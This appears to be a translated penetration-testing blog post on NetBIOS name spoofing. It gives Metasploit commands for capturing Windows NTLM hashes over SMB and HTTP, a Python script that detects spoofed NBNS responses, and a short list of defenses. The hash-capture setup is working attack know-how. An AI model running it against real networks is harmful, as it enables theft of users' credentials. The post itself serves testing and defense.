Preface
During internal network penetration testing, ARP spoofing, DNS spoofing and similar methods are often very effective. But because these techniques are old, there is plenty of defensive software for them, and more and more network devices now ship with ARP spoofing protection, which makes internal penetration harder.
Recently I used NetBIOS spoofing in a penetration test. The technique works against the Windows XP, 2003, Vista, 7 and 2008 series and can capture system hashes at low cost, without relying on ARP spoofing.
NetBIOS Name Service (NBNS) Description
The NetBIOS protocol is an application programming interface (API) that programs on a LAN can use. It provides a uniform command set through which a program requests low-level services, and its purpose is to provide networking and other special functions to the LAN. The system can resolve NetBIOS names to the corresponding IP addresses through the WINS service, broadcast, the lmhosts file and other methods, so NetBIOS can be used within the LAN for message communication and resource sharing.
Windows name resolution proceeds in this order:
1. The local hosts file: C:\Windows\System32\drivers\etc\hosts
2. DNS
3. NBNS
When a user enters a domain name that does not exist, and neither the local hosts file nor the DNS server can resolve it, the cute and user-friendly Windows system sends out an NBNS query.
Look closely at a packet capture and you will find the most powerful part: the NBNS request is a broadcast packet!
That means anyone can reply to it and redirect the traffic, without relying on ARP spoofing. This is amazing...
Now the idea is clear: our goal is to send an NBNS response, so that traffic is redirected to us for spoofing.
Method
Currently NetBIOS spoofing can be used in two ways: HTTP and SMB.
Open Metasploit, use the nbns_response module, and set the spoofed IP address:
SMB:
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /home/tm/johnsmb
JOHNPWFILE => /home/tm/johnsmb
msf auxiliary(smb) > show options

Module options (auxiliary/server/capture/smb):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain & Abel format
   CHALLENGE   1122334455667788  yes       The 8 byte challenge
   JOHNPWFILE  /home/tm/johnsmb  no        The prefix to the local filename to store the hashes in JOHN format
   LOGFILE                       no        The local filename to store the captured hashes
   SRVHOST     0.0.0.0           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     445               yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

msf auxiliary(smb) > run
[*] Auxiliary module execution completed
[*] Server started.
HTTP:
msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm
msf auxiliary(http_ntlm) > set LOGFILE /home/tm/httplog
LOGFILE => /home/tm/johnhttp
msf auxiliary(http_ntlm) > set URIPATH /
URIPATH => /
msf auxiliary(http_ntlm) > set SRVPORT 80
SRVPORT => 80
Scenario
1. On the same switched network segment, a Windows host accesses a domain name that does not exist, for example http://thanks1132124324.com
2. On the same switched network segment, a Windows host attempts SMB communication with a host that does not exist, for example \\thanks1132124324
In both of the above cases we can obtain the hash of the target host (the test machine was Windows 7).
Once the hash is obtained, further steps such as cracking and pass-the-hash will not be described here. Note that the hash mechanism (NTLMv2) used by newer Windows versions makes cracking more difficult.
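The protocol description above (NBNS queries are broadcast, so any host can answer) and the two scenarios just listed both come down to the same observable event on the wire: a host answering a broadcast name query it has no business answering. The following Python script is an added example, not part of the original post and not Metasploit code: it encodes and decodes NetBIOS names the way NBNS carries them (RFC 1002 first-level encoding), parses constructed query and response packets, and runs a simple detector over constructed sample traffic. All addresses, host names and the three detection heuristics are assumptions chosen for the example.

```python
import struct
from collections import defaultdict
from dataclasses import dataclass, field

NB_FLAG_RESPONSE = 0x8000   # R bit: packet is a response
NB_FLAG_BROADCAST = 0x0010  # B bit: the query was broadcast
NB_TYPE_NB = 0x0020         # question type NB (name -> IPv4 address)
NB_CLASS_IN = 0x0001

def encode_nb_name(name: str, suffix: int = 0x00) -> bytes:
    """First-level encoding: pad to 15 chars, append the suffix byte,
    then write each byte as two nibbles with 'A' added to each."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    return bytes(0x41 + n for b in raw for n in (b >> 4, b & 0x0F))

def decode_nb_name(encoded: bytes) -> tuple:
    """Reverse of encode_nb_name; returns (name, suffix)."""
    if len(encoded) != 32 or any(c < 0x41 or c > 0x50 for c in encoded):
        raise ValueError("not a first-level encoded NetBIOS name")
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41)
                for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]

@dataclass
class NbnsPacket:
    tid: int
    is_response: bool
    is_broadcast: bool
    name: str
    suffix: int
    answer_ips: list = field(default_factory=list)

def build_query(tid: int, name: str) -> bytes:
    """Constructed NB name query as a client broadcasts it (flags RD + B)."""
    header = struct.pack("!6H", tid, 0x0110, 1, 0, 0, 0)
    question = b"\x20" + encode_nb_name(name) + b"\x00"
    return header + question + struct.pack("!HH", NB_TYPE_NB, NB_CLASS_IN)

def build_response(tid: int, name: str, ip: str) -> bytes:
    """Constructed positive name response (flags R + AA + RD)."""
    header = struct.pack("!6H", tid, 0x8500, 0, 1, 0, 0)
    rr_name = b"\x20" + encode_nb_name(name) + b"\x00"
    rdata = b"\x00\x00" + bytes(int(o) for o in ip.split("."))  # NB_FLAGS + IPv4
    fixed = struct.pack("!HHIH", NB_TYPE_NB, NB_CLASS_IN, 300, len(rdata))
    return header + rr_name + fixed + rdata

def parse_nbns(payload: bytes) -> NbnsPacket:
    tid, flags = struct.unpack("!HH", payload[:4])
    if payload[12] != 0x20:
        raise ValueError("expected a 32-byte encoded label")
    name, suffix = decode_nb_name(payload[13:45])
    off = 12 + 1 + 32 + 1 + 4          # header, label, root label, TYPE + CLASS
    pkt = NbnsPacket(tid, bool(flags & NB_FLAG_RESPONSE),
                     bool(flags & NB_FLAG_BROADCAST), name, suffix)
    if pkt.is_response:
        _ttl, rdlen = struct.unpack("!IH", payload[off:off + 6])
        rdata = payload[off + 6:off + 6 + rdlen]
        for i in range(0, rdlen, 6):   # each entry: NB_FLAGS(2) + IPv4(4)
            pkt.answer_ips.append(".".join(str(b) for b in rdata[i + 2:i + 6]))
    return pkt

def detect_spoofed_responses(packets, many_names_threshold: int = 3) -> list:
    """packets: iterable of (src_ip, payload). Assumed heuristics: a response
    with no matching broadcast query (or a second answer to the same query),
    an answer pointing at an address other than the responder's own, and one
    responder answering for many distinct names."""
    pending = {}                       # transaction id -> requester IP
    names_by_responder = defaultdict(set)
    alerts = []
    for src, payload in packets:
        pkt = parse_nbns(payload)
        if not pkt.is_response:
            if pkt.is_broadcast:
                pending[pkt.tid] = src
            continue
        if pkt.tid not in pending:
            alerts.append(f"unsolicited NBNS response from {src} for {pkt.name}")
            continue
        requester = pending.pop(pkt.tid)
        if any(ip != src for ip in pkt.answer_ips):
            alerts.append(f"{src} answered {pkt.name} for {requester} "
                          f"with foreign address {pkt.answer_ips}")
        names_by_responder[src].add(pkt.name)
        if len(names_by_responder[src]) == many_names_threshold:
            alerts.append(f"{src} answered {many_names_threshold} different "
                          f"names: likely NBNS spoofer")
    return alerts

# Constructed sample traffic (TEST-NET addresses): 192.0.2.10 answers every
# name it sees, 192.0.2.50 is a real file server answering only for itself.
SAMPLE_TRAFFIC = [
    ("192.0.2.20", build_query(0x1234, "NOSUCHHOST")),
    ("192.0.2.10", build_response(0x1234, "NOSUCHHOST", "192.0.2.10")),
    ("192.0.2.21", build_query(0x2222, "PRINTSRV")),
    ("192.0.2.10", build_response(0x2222, "PRINTSRV", "192.0.2.10")),
    ("192.0.2.22", build_query(0x4444, "FILESRV01")),
    ("192.0.2.50", build_response(0x4444, "FILESRV01", "192.0.2.50")),
    ("192.0.2.20", build_query(0x3333, "FILESRV")),
    ("192.0.2.10", build_response(0x3333, "FILESRV", "192.0.2.99")),
    ("192.0.2.10", build_response(0x9999, "INTRANET", "192.0.2.10")),
]
```

Running `detect_spoofed_responses(SAMPLE_TRAFFIC)` yields three alerts: the answer for FILESRV that points at a third address, the threshold alert once 192.0.2.10 has answered three different names, and the unsolicited answer for INTRANET. The "many names" heuristic is the one that matters in practice, because a legitimate host only ever answers for its own name, while a spoofer answers everything the segment asks for; the parser is what turns UDP port 137 payloads into something the heuristic can be applied to.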
IV. Defense methods
1. Use strong passwords on Windows systems, to make hash cracking harder
2. Disable NetBIOS over TCP/IP
Author: Thanks Site: http://www.freebuf.com